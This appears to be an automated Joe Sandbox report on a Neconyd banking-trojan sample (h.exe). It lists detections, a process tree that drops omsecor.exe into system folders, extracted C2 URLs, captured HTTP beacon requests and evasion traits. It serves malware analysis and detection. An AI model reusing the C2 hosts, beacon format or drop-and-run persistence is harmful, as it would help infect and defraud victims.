Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
h.exe

Overview

General Information

Sample name:h.exe
Analysis ID:1379486
MD5:564451e54fa0196acd2fd7f771e5ed1c
SHA1:fd0a26fea635276bc7b54d572f2dbeb7bfd2e1fc
SHA256:3e4a9ecdc59ebcf0941aa0c37a6704ddfe15eadcc3f16d1023132445736df30f
Infos:

Detection

Neconyd
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Neconyd
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • h.exe (PID: 1468 cmdline: C:\Users\user\Desktop\h.exe MD5: 564451E54FA0196ACD2FD7F771E5ED1C)
    • omsecor.exe (PID: 1228 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: 77F1965059059CE58EC10CCA09F566D1)
      • omsecor.exe (PID: 7740 cmdline: C:\Windows\System32\omsecor.exe MD5: 5A37340FA852E5184BBBA4134E60B591)
  • cleanup
{"C2 url": ["http://ow5dirasuek.com/", "http://lousta.net/", "http://mkkuei4kdsz.com/"]}
SourceRuleDescriptionAuthorStrings
Process Memory Space: h.exe PID: 1468JoeSecurity_NeconydYara detected NeconydJoe Security
    Process Memory Space: omsecor.exe PID: 1228JoeSecurity_NeconydYara detected NeconydJoe Security
      Process Memory Space: omsecor.exe PID: 7740JoeSecurity_NeconydYara detected NeconydJoe Security
        No Sigma rule has matched
        Timestamp:34.41.229.245192.168.2.780497092037771 01/23/24-13:39:19.732410
        SID:2037771
        Source Port:80
        Destination Port:49709
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.734.41.229.24549709802015786 01/23/24-13:39:19.422200
        SID:2015786
        Source Port:49709
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.7193.166.255.17149699802015786 01/23/24-13:38:35.744468
        SID:2015786
        Source Port:49699
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.764.225.91.7349713802015786 01/23/24-13:40:05.584888
        SID:2015786
        Source Port:49713
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.764.225.91.7349708802015786 01/23/24-13:39:18.638291
        SID:2015786
        Source Port:49708
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: h.exeAvira: detected
        Source: http://lousta.net/F.Avira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/92/650.htmlx;Avira URL Cloud: Label: malware
        Source: http://lousta.net/242/343.htmlAvira URL Cloud: Label: malware
        Source: http://lousta.net/763/735.htmlr-bAvira URL Cloud: Label: malware
        Source: http://mkkuei4kdsz.com/Avira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/92/650.htmlAvira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/SAvira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/TAvira URL Cloud: Label: malware
        Source: http://lousta.net/650/534.htmlAvira URL Cloud: Label: malware
        Source: http://lousta.net/Avira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/580/608.htmlEAvira URL Cloud: Label: malware
        Source: http://mkkuei4kdsz.com/569/916.html9Avira URL Cloud: Label: malware
        Source: http://mkkuei4kdsz.com/1EF8FD00309293F2C34F3LAvira URL Cloud: Label: malware
        Source: http://lousta.net/763/735.html$Avira URL Cloud: Label: malware
        Source: http://lousta.net/7/91.htmlAvira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/580/608.htmlAvira URL Cloud: Label: malware
        Source: http://lousta.net/876/244.htmlAvira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/580/608.html7Avira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/lousta.netAvira URL Cloud: Label: malware
        Source: http://lousta.net/763/735.htmlAvira URL Cloud: Label: malware
        Source: http://mkkuei4kdsz.com/569/916.htmlAvira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/92/650.htmlwsAvira URL Cloud: Label: malware
        Source: http://lousta.net/7/91.htmlaAvira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodconAvira URL Cloud: Label: malware
        Source: http://lousta.net/763/735.htmlZAvira URL Cloud: Label: malware
        Source: http://lousta.net/650/534.htmlrAvira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/580/608.htmlgAvira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/Avira URL Cloud: Label: malware
        Source: http://lousta.net/0Avira URL Cloud: Label: malware
        Source: http://mkkuei4kdsz.com/470/855.htmlAvira URL Cloud: Label: malware
        Source: http://lousta.net/763/735.htmlhtmlAvira URL Cloud: Label: malware
        Source: http://mkkuei4kdsz.com/470/855.html-8a8d424fbe43573ef1HiLMEMAvira URL Cloud: Label: malware
        Source: http://lousta.net/763/735.html_-OAvira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/92/650.htmll;Avira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/580/608.htmlmAvira URL Cloud: Label: malware
        Source: http://ow5dirasuek.com/580/608.htmlkAvira URL Cloud: Label: malware
        Source: http://lousta.net/763/735.htmlHAvira URL Cloud: Label: malware
        Source: http://mkkuei4kdsz.com/569/916.html#Avira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Roaming\omsecor.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
        Source: C:\Windows\SysWOW64\omsecor.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
        Source: h.exeMalware Configuration Extractor: Neconyd {"C2 url": ["http://ow5dirasuek.com/", "http://lousta.net/", "http://mkkuei4kdsz.com/"]}
        Source: lousta.netVirustotal: Detection: 12%Perma Link
        Source: mkkuei4kdsz.comVirustotal: Detection: 12%Perma Link
        Source: ow5dirasuek.comVirustotal: Detection: 8%Perma Link
        Source: http://mkkuei4kdsz.com/Virustotal: Detection: 12%Perma Link
        Source: http://ow5dirasuek.com/SVirustotal: Detection: 8%Perma Link
        Source: http://lousta.net/Virustotal: Detection: 12%Perma Link
        Source: http://ow5dirasuek.com/TVirustotal: Detection: 6%Perma Link
        Source: http://lousta.net/650/534.htmlVirustotal: Detection: 7%Perma Link
        Source: http://ow5dirasuek.com/92/650.htmlVirustotal: Detection: 10%Perma Link
        Source: http://ow5dirasuek.com/580/608.htmlVirustotal: Detection: 8%Perma Link
        Source: http://ow5dirasuek.com/lousta.netVirustotal: Detection: 7%Perma Link
        Source: http://lousta.net/876/244.htmlVirustotal: Detection: 14%Perma Link
        Source: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodconVirustotal: Detection: 6%Perma Link
        Source: http://lousta.net/763/735.htmlVirustotal: Detection: 8%Perma Link
        Source: http://lousta.net/0Virustotal: Detection: 14%Perma Link
        Source: http://mkkuei4kdsz.com/470/855.htmlVirustotal: Detection: 13%Perma Link
        Source: http://ow5dirasuek.com/Virustotal: Detection: 8%Perma Link
        Source: C:\Users\user\AppData\Roaming\omsecor.exeReversingLabs: Detection: 100%
        Source: C:\Windows\SysWOW64\omsecor.exeReversingLabs: Detection: 100%
        Source: h.exeReversingLabs: Detection: 100%
        Source: h.exeVirustotal: Detection: 88%Perma Link
        Source: C:\Users\user\AppData\Roaming\omsecor.exeJoe Sandbox ML: detected
        Source: C:\Windows\SysWOW64\omsecor.exeJoe Sandbox ML: detected
        Source: h.exeJoe Sandbox ML: detected
        Source: h.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_0040ABD9 FindFirstFileW,FindClose,0_2_0040ABD9
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00408248
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_0040ABD9 FindFirstFileW,FindClose,13_2_0040ABD9
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,13_2_00408248

        Networking

        barindex
        Source: TrafficSnort IDS: 2015786 ET TROJAN Ransom.Win32.Birele.gsg Checkin 192.168.2.7:49699 -> 193.166.255.171:80
        Source: TrafficSnort IDS: 2015786 ET TROJAN Ransom.Win32.Birele.gsg Checkin 192.168.2.7:49708 -> 64.225.91.73:80
        Source: TrafficSnort IDS: 2015786 ET TROJAN Ransom.Win32.Birele.gsg Checkin 192.168.2.7:49709 -> 34.41.229.245:80
        Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.41.229.245:80 -> 192.168.2.7:49709
        Source: TrafficSnort IDS: 2015786 ET TROJAN Ransom.Win32.Birele.gsg Checkin 192.168.2.7:49713 -> 64.225.91.73:80
        Source: Malware configuration extractorURLs: http://ow5dirasuek.com/
        Source: Malware configuration extractorURLs: http://lousta.net/
        Source: Malware configuration extractorURLs: http://mkkuei4kdsz.com/
        Source: global trafficHTTP traffic detected: GET /650/534.html HTTP/1.1From: 133504871133179231Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Ad98d3i64ead;d:785id3i55e09<a9858Host: lousta.netConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /470/855.html HTTP/1.1From: 133504871133179231Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Ad98d3i64ead;d:785id3i55e09<a9858Host: mkkuei4kdsz.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /92/650.html HTTP/1.1From: 133504871133179231Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Ad98d3i64ead;d:785id3i55e09<a9858Host: ow5dirasuek.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /569/916.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: mkkuei4kdsz.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Source: global trafficHTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Source: global trafficHTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Source: global trafficHTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Source: global trafficHTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Source: Joe Sandbox ViewIP Address: 64.225.91.73 64.225.91.73
        Source: Joe Sandbox ViewIP Address: 193.166.255.171 193.166.255.171
        Source: Joe Sandbox ViewIP Address: 193.166.255.171 193.166.255.171
        Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
        Source: Joe Sandbox ViewASN Name: FUNETASFI FUNETASFI
        Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_00407036 Sleep,DeleteFileW,CreateFileW,GetLastError,SetEndOfFile,InternetOpenUrlW,CloseHandle,InternetQueryDataAvailable,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,0_2_00407036
        Source: global trafficHTTP traffic detected: GET /650/534.html HTTP/1.1From: 133504871133179231Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Ad98d3i64ead;d:785id3i55e09<a9858Host: lousta.netConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /470/855.html HTTP/1.1From: 133504871133179231Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Ad98d3i64ead;d:785id3i55e09<a9858Host: mkkuei4kdsz.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /92/650.html HTTP/1.1From: 133504871133179231Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Ad98d3i64ead;d:785id3i55e09<a9858Host: ow5dirasuek.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /569/916.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: mkkuei4kdsz.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Source: global trafficHTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Source: global trafficHTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Source: global trafficHTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Source: global trafficHTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85|81.181.57.74|1706013559|1706013559|0|1|0
        Source: unknownDNS traffic detected: queries for: lousta.net
        Source: omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/0
        Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/242/343.html
        Source: omsecor.exe, 00000002.00000002.1665837738.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/650/534.html
        Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/650/534.htmlr
        Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/7/91.html
        Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/7/91.htmla
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/763/735.html
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/763/735.html$
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/763/735.htmlH
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/763/735.htmlZ
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/763/735.html_-O
        Source: omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/763/735.htmlhtml
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/763/735.htmlr-b
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/876/244.html
        Source: omsecor.exe, 00000002.00000003.1646596868.000000000083E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/F.
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/1EF8FD00309293F2C34F3L
        Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/470/855.html
        Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/470/855.html-8a8d424fbe43573ef1HiLMEM
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/569/916.html
        Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/569/916.html#
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/569/916.html9
        Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/580/608.html
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/580/608.html7
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/580/608.htmlE
        Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/580/608.htmlg
        Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/580/608.htmlk
        Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/580/608.htmlm
        Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/92/650.html
        Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/92/650.htmll;
        Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/92/650.htmlws
        Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/92/650.htmlx;
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/S
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/T
        Source: h.exe, omsecor.exe.0.dr, omsecor.exe.2.drString found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
        Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/lousta.net
        Source: omsecor.exe, 00000002.00000002.1665581772.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://domaincntrol.com/?orighost=
        Source: omsecor.exe, 00000002.00000002.1665581772.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://nojs.domaincntrol.com

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: Process Memory Space: h.exe PID: 1468, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 1228, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 7740, type: MEMORYSTR
        Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to behavior
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_00401C410_2_00401C41
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_0040D2A40_2_0040D2A4
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_0040B51C0_2_0040B51C
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_0040CBD00_2_0040CBD0
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_00401C4113_2_00401C41
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_0040D2A413_2_0040D2A4
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_0040B51C13_2_0040B51C
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_0040CBD013_2_0040CBD0
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: String function: 00405511 appears 56 times
        Source: C:\Users\user\Desktop\h.exeCode function: String function: 00405511 appears 56 times
        Source: h.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@5/2@3/3
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_0040A057 GetForegroundWindow,CoCreateInstance,SetForegroundWindow,0_2_0040A057
        Source: C:\Users\user\Desktop\h.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
        Source: h.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\h.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: h.exeReversingLabs: Detection: 100%
        Source: h.exeVirustotal: Detection: 88%
        Source: C:\Users\user\Desktop\h.exeFile read: C:\Users\user\Desktop\h.exeJump to behavior
        Source: C:\Users\user\Desktop\h.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_0-5765
        Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_13-5766
        Source: unknownProcess created: C:\Users\user\Desktop\h.exe C:\Users\user\Desktop\h.exe
        Source: C:\Users\user\Desktop\h.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
        Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
        Source: C:\Users\user\Desktop\h.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\omsecor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004032B8
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_0040D293 push ecx; ret 0_2_0040D2A3
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_0040CBB5 push ecx; ret 0_2_0040CBC8
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_0040D293 push ecx; ret 13_2_0040D2A3
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_0040CBB5 push ecx; ret 13_2_0040CBC8

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\AppData\Roaming\omsecor.exeExecutable created and started: C:\Windows\SysWOW64\omsecor.exeJump to behavior
        Source: C:\Users\user\Desktop\h.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
